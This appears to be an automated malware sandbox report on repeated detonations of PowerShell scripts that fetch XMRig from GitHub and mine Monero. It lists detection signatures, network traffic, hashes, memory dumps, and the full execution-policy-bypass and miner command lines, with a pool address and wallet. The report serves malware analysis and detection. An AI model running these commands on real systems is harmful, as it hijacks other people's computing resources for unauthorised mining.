N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.178.89.13.in-addr.arpa udp

Files

memory/4396-0-0x00007FFE0DD13000-0x00007FFE0DD15000-memory.dmp

memory/4396-1-0x00000224B5C70000-0x00000224B5C92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yklebnat.tv5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4396-11-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp

memory/4396-12-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp

memory/4396-14-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp

memory/4396-16-0x00000224B5CA0000-0x00000224B5CAA000-memory.dmp

memory/4396-15-0x00000224CE6B0000-0x00000224CE6C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4880-47-0x000001CDF0D30000-0x000001CDF0D50000-memory.dmp

memory/4880-48-0x000001CDF0D70000-0x000001CDF0D90000-memory.dmp

memory/4880-49-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-52-0x000001CDF0DB0000-0x000001CDF0DD0000-memory.dmp

memory/4880-50-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-51-0x000001CDF0D90000-0x000001CDF0DB0000-memory.dmp

memory/4396-53-0x00007FFE0DD13000-0x00007FFE0DD15000-memory.dmp

memory/4396-54-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp

memory/4880-55-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-56-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-57-0x000001CDF0D90000-0x000001CDF0DB0000-memory.dmp

memory/4880-58-0x000001CDF0DB0000-0x000001CDF0DD0000-memory.dmp

memory/4880-59-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-60-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-61-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-62-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-63-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-64-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-65-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-66-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-67-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-68-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-69-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-70-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-71-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-72-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-73-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-74-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-75-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-76-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-77-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-78-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-79-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-80-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-81-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-82-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-83-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-84-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-85-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-86-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-87-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-88-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-89-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-90-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-91-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-92-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-93-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-94-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-95-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-96-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-97-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-98-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-99-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-100-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-101-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-102-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-103-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-104-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-105-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-106-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-107-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-108-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-109-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-110-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-111-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-112-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-113-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-114-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-115-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-116-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-117-0x00007FF787660000-0x00007FF788293000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:52

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 120.150.79.40.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/424-3-0x00007FFF29BE3000-0x00007FFF29BE4000-memory.dmp

memory/424-5-0x0000017AF8A00000-0x0000017AF8A22000-memory.dmp

memory/424-6-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/424-9-0x0000017AF8CE0000-0x0000017AF8D56000-memory.dmp

memory/424-10-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2urym15v.drn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/424-25-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/424-48-0x0000017AF8CC0000-0x0000017AF8CD2000-memory.dmp

memory/424-61-0x0000017AF8CB0000-0x0000017AF8CBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1376-90-0x0000013F164E0000-0x0000013F16500000-memory.dmp

memory/424-92-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/1376-91-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/424-94-0x00007FFF29BE3000-0x00007FFF29BE4000-memory.dmp

memory/1376-93-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/424-95-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/1376-96-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-97-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-98-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-99-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-100-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-101-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-102-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-103-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-104-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-105-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-106-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-107-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-108-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-109-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-110-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-111-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-112-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-113-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-114-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-115-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-116-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-117-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-118-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-119-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-120-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-121-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-122-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-123-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-124-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-125-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-126-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-127-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-128-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-129-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-130-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-131-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-132-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-133-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-134-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-135-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-136-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-137-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-138-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-139-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-140-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-141-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-142-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-143-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-144-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-145-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-146-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-147-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-148-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-149-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-150-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-151-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-152-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-153-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-154-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-155-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-156-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:11

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1745s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/4676-0-0x00007FFFC2E03000-0x00007FFFC2E04000-memory.dmp

memory/4676-5-0x000001A7C9320000-0x000001A7C9342000-memory.dmp

memory/4676-7-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-10-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-11-0x000001A7C9FF0000-0x000001A7CA066000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pxl0hafg.kma.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4676-26-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-49-0x000001A7C94E0000-0x000001A7C94F2000-memory.dmp

memory/4676-62-0x000001A7C94C0000-0x000001A7C94CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1204-91-0x00000231D86E0000-0x00000231D8700000-memory.dmp

memory/1204-92-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-93-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/4676-95-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-94-0x00007FFFC2E03000-0x00007FFFC2E04000-memory.dmp

memory/4676-96-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-97-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/1204-98-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-99-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-100-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-101-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-102-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-103-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-104-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-105-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-106-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-107-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-108-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-109-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-110-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-111-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-112-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-113-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-114-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-115-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-116-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-117-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-118-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-119-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-120-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-121-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

